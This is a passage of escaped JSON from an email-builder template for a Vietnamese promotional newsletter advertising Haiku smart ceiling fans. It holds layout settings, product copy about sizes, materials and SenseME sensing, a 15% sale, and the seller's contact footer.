15px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">NH\\u00c0 CUNG C\\u1ea4P \\u1ee6Y QUY\\u1ec0N CH\\u00cdNH H\\u00c3NG HAIKU - BIG ASS FANS T\\u1ea0I VI\\u1ec6T NAM<\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_1\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"#a47e6b\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_1\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"wnM4rRZ1up\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"WlezPt2_J3\\\",\\\"contents\\\":[{\\\"id\\\":\\\"56KZmfuYsA\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677922756155-smart-fans-haiku.jpg\\\",\\\"width\\\":2482,\\\"height\\\":3510},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_3\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"SBnl2jWXAQ\\\",\\\"type\\\":\\\"html\\\",\\\"values\\\":{\\\"html\\\":\\\"<div class=\\\\\\\"col-lg-12 col-md-12 col-sm-12 col-xs-12\\\\\\\">\\\\n<h3><span style=\\\\\\\"font-size: 16px;\\\\\\\">K\\u00edch th\\u01b0\\u1edbc \\u0111\\u01b0\\u1eddng k\\u00ednh c\\u00e1nh qu\\u1ea1t Haiku<\\/span><\\/h3>\\\\n<p>52 inch, 60 inch v\\u00e0 84 inch. N\\u1ebfu b\\u1ea1n c\\u1ea7n c\\u00e1nh l\\u1edbn h\\u01a1n? H\\u00e3y xem <strong><a href=\\\\\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-canh-lon\\\\\\\">Qu\\u1ea1t Tr\\u1ea7n C\\u00e1nh L\\u1edbn<\\/a>.<\\/strong><\\/p>\\\\n  <img src=\\\\\\\"https:\\/\\/bigfans.vn\\/img\\/cms\\/demesion-fans\\/Fan-Haiku-Sizes.svg\\\\\\\" alt=\\\\\\\"Haiku Fans Size\\\\\\\"><\\/div><div class=\\\\\\\"col-lg-12 col-md-12 col-sm-12 col-xs-12\\\\\\\">\\\\n<h2><span style=\\\\\\\"font-size: 16px;\\\\\\\">K\\u00edch th\\u01b0\\u1edbc c\\u00e1nh qu\\u1ea1t Haiku ph\\u00f9 h\\u1ee3p d\\u00e0nh cho Nh\\u00e0 \\u1ede, Bi\\u1ec7t Th\\u1ef1, Penthouse.<\\/span><\\/h2>\\\\n<p>Thi\\u1ebft k\\u1ebf qu\\u1ea1t tr\\u1ea7n Haiku c\\u00f3 s\\u1ea3i c\\u00e1nh ph\\u1ed5 th\\u00f4ng 3 c\\u00e1nh ch\\u1ea5t li\\u1ec7u Bamboo\\/Aluminium\\/Composite<\\/p>\\\\n<img src=\\\\\\\"https:\\/\\/bigfans.vn\\/img\\/cms\\/demesion-fans\\/Haiku-Dimensions.svg\\\\\\\" alt=\\\\\\\"Haiku Fans Size\\\\\\\"><\\/div>\\\\n\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_html_1\\\",\\\"htmlClassNames\\\":\\\"u_content_html\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"EMkB6Vrllj\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"25px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#a47e6b\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_3\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong><span style=\\\\\\\"font-size: 32px; line-height: 44.8px; font-family: \'Playfair Display\', serif;\\\\\\\">\\\\\\\" \\u0110\\u1eb3ng c\\u1ea5p th\\u01b0\\u1ee3ng l\\u01b0u<\\/span><\\/strong><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong><span style=\\\\\\\"font-family: \'Playfair Display\', serif; font-size: 32px; line-height: 44.8px;\\\\\\\">Ti\\u1ec7n \\u00edch x\\u1ee9ng t\\u1ea7m \\\\\\\"<\\/span><\\/strong><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"VbL1kpvFRg\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#292828\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_4\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong>CH\\u1ea4T LI\\u1ec6U CAO C\\u1ea4P<\\/strong><br \\/>Haiku\\u00ae \\u0111\\u01b0\\u1ee3c l\\u00e0m th\\u1ee7 c\\u00f4ng v\\u1edbi<br \\/>v\\u1eadt li\\u1ec7u ch\\u1ea5t l\\u01b0\\u1ee3ng cao, nh\\u01b0 Moso Bamboo\\u00a0<br \\/>ho\\u1eb7c Alumium (aircraft-grade). Qu\\u1ea1t Haiku\\u00a0<br \\/>\\u0111\\u01b0\\u1ee3c c\\u00e2n b\\u1eb1ng tay trong quy tr\\u00ecnh 13 b\\u01b0\\u1edbc,\\u00a0<br \\/>\\u0111\\u1ea3m b\\u1ea3o s\\u1ebd kh\\u00f4ng c\\u00f3 qu\\u1ea1t n\\u00e0o rung l\\u1eafc.<\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"n7WfELuq5h\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"15px 10px 25px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#a87f6b\\\",\\\"backgroundColor\\\":\\\"#ffffff\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{\\\"borderTopColor\\\":\\\"#CCC\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderLeftColor\\\":\\\"#CCC\\\",\\\"borderLeftStyle\\\":\\\"solid\\\",\\\"borderLeftWidth\\\":\\\"1px\\\",\\\"borderRightColor\\\":\\\"#CCC\\\",\\\"borderRightStyle\\\":\\\"solid\\\",\\\"borderRightWidth\\\":\\\"1px\\\",\\\"borderBottomColor\\\":\\\"#CCC\\\",\\\"borderBottomStyle\\\":\\\"solid\\\",\\\"borderBottomWidth\\\":\\\"1px\\\"},\\\"borderRadius\\\":\\\"1px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_3\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong><span style=\\\\\\\"line-height: 16.8px;\\\\\\\">R E A D\\u00a0 M O R E<\\/span><\\/strong>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":152,\\\"calculatedHeight\\\":37}},{\\\"id\\\":\\\"-H-RpfJAgN\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677923146192-Brochure_Haiku_New.jpg\\\",\\\"width\\\":2550,\\\"height\\\":3300},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_4\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_5\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#ecf0f1\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1612262724776-H.png\\\",\\\"fullWidth\\\":false,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"width\\\":600,\\\"height\\\":224,\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_4\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"NcaesyMqCK\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"D15V5OdQMy\\\",\\\"contents\\\":[{\\\"id\\\":\\\"a9T_o4TtZN\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"25px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#a77d6d\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_5\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-family: \'Playfair Display\', serif; line-height: 19.6px;\\\\\\\"><span style=\\\\\\\"font-size: 34px; line-height: 47.6px;\\\\\\\"><strong>Sale Off 15%<\\/strong><\\/span><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"LJC_ksl8Gr\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"fontWeight\\\":400,\\\"fontSize\\\":\\\"20px\\\",\\\"color\\\":\\\"#34495e\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_6\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-family: inherit; line-height: 49px; font-size: 18px;\\\\\\\"><strong>GI\\u00c1M S\\u00c1T C\\u00d4NG NGH\\u1ec6 TH\\u00d4NG MINH<\\/strong><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"ch7zwTHuZu\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"48%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"2px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#34495e\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"5px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_1\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"uhMkQt1D2G\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"160%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_7\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 160%;\\\\\\\">C\\u00f4ng ngh\\u1ec7 SenseME\\u2122 gi\\u00e1m s\\u00e1t c\\u0103n ph\\u00f2ng \\u00a0\\u0111\\u1ea3m\\u00a0<br \\/>b\\u1ea3o nhi\\u1ec7t \\u0111\\u1ed9 v\\u00e0 \\u0111\\u1ed9 \\u1ea9m, t\\u1ef1 \\u0111\\u1ed9ng \\u0111i\\u1ec1u ch\\u1ec9nh \\u00a0t\\u1ed1c \\u0111\\u1ed9\\u00a0<br \\/>Haiku khi \\u0111i\\u1ec1u ki\\u1ec7n thay \\u0111\\u1ed5i. N\\u1ebfu th\\u1eddi ti\\u1ebft n\\u00f3ng l\\u00ean\\u00a0<br \\/>SenseME ph\\u00e1t hi\\u1ec7n v\\u00e0 t\\u0103ng t\\u1ed1c \\u0111\\u1ed9 Haiku. M\\u1edf c\\u1eeda\\u00a0<br \\/>s\\u1ed5 v\\u00e0o ban \\u0111\\u00eam v\\u00e0 SenseME s\\u1ebd t\\u1ef1 \\u0111\\u1ed9ng gi\\u1ea3m t\\u1ed1c\\u00a0<br \\/>\\u0111\\u1ed9 qu\\u1ea1t khi nhi\\u1ec7t \\u0111\\u1ed9 gi\\u1ea3m.<\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"2z6L5HzXUD\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"15px 10px 40px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#a87f6b\\\",\\\"backgroundColor\\\":\\\"#ffffff\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{\\\"borderTopColor\\\":\\\"#CCC\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderLeftColor\\\":\\\"#CCC\\\",\\\"borderLeftStyle\\\":\\\"solid\\\",\\\"borderLeftWidth\\\":\\\"1px\\\",\\\"borderRightColor\\\":\\\"#CCC\\\",\\\"borderRightStyle\\\":\\\"solid\\\",\\\"borderRightWidth\\\":\\\"1px\\\",\\\"borderBottomColor\\\":\\\"#CCC\\\",\\\"borderBottomStyle\\\":\\\"solid\\\",\\\"borderBottomWidth\\\":\\\"1px\\\"},\\\"borderRadius\\\":\\\"1px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_1\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong><span style=\\\\\\\"line-height: 16.8px;\\\\\\\">R E A D\\u00a0 M O R E<\\/span><\\/strong>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":152,\\\"calculatedHeight\\\":37}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_4\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_3\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"gPbBQY2Q9v\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"w4JwDjRYXv\\\",\\\"contents\\\":[{\\\"id\\\":\\\"UqCJOkDb9C\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"30px 10px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#a5726e\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_9\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 14px; line-height: 19.6px;\\\\\\\"><strong><span style=\\\\\\\"line-height: 19.6px; font-size: 14px;\\\\\\\">F O L L O W&nbsp; &nbsp;A L O N G&nbsp; &nbsp;W I T H&nbsp; &nbsp;U S<\\/span><\\/strong><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"rktmzZAX4g\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"28%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"2px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#ca979a\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_4\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"tIS5FWVh8R\\\",\\\"type\\\":\\\"social\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"icons\\\":{\\\"iconType\\\":\\\"rounded\\\",\\\"icons\\\":[{\\\"url\\\":\\\"https:\\/\\/pinterest.com\\/\\\",\\\"name\\\":\\\"Pinterest\\\"},{\\\"url\\\":\\\"https:\\/\\/youtube.com\\/\\\",\\\"name\\\":\\\"YouTube\\\"},{\\\"url\\\":\\\"https:\\/\\/instagram.com\\/\\\",\\\"name\\\":\\\"Instagram\\\"},{\\\"url\\\":\\\"https:\\/\\/soundcloud.com\\/\\\",\\\"name\\\":\\\"SoundCloud\\\"}],\\\"editor\\\":{\\\"data\\\":{\\\"showDefaultIcons\\\":true,\\\"showDefaultOptions\\\":true,\\\"customIcons\\\":[],\\\"customOptions\\\":[]}}},\\\"align\\\":\\\"center\\\",\\\"spacing\\\":14,\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_social_1\\\",\\\"htmlClassNames\\\":\\\"u_content_social\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"ozkROz9f_1\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"150%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_10\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 150%;\\\\\\\">T\\u1ed5ng \\u0111\\u00e0i b\\u00e1n h\\u00e0ng: 028.73033369<br \\/>EMAIL: sale@hogiaphat.vn\\u00a0<br \\/>SR Th\\u1ee7 \\u0110\\u1ee9c: 184 Tr\\u1ea7n L\\u1ef1u, An Ph\\u00fa, Tp Th\\u1ee7 \\u0110\\u1ee9c, Tp HCM<\\/p>\\\\n<p style=\\\\\\\"line-height: 150%;\\\\\\\">SR Qu\\u1eadn 7: Happy Valley, 812 Nguy\\u1ec5n V\\u0103n Linh, T\\u00e2n Phong, Qu\\u1eadn 7, Tp HCM<br \\/>\\u00a0<br \\/>\\u00a9Hamiton Air Fans\\u2122. All Rights Reserved.<\\/p>\\\\n<p style=\\\\\\\"line-height: 150%;\\\\\\\">C\\u00d4NG TY C\\u1ed4 PH\\u1ea6N C\\u00d4NG NGH\\u1ec6 HAMILTON AIR<br \\/>MST: 0315778682 do s\\u1edf KH v\\u00e0 \\u0111\\u1ea7u t\\u01b0 Tp.HCM.\\u00a0<\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_8\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\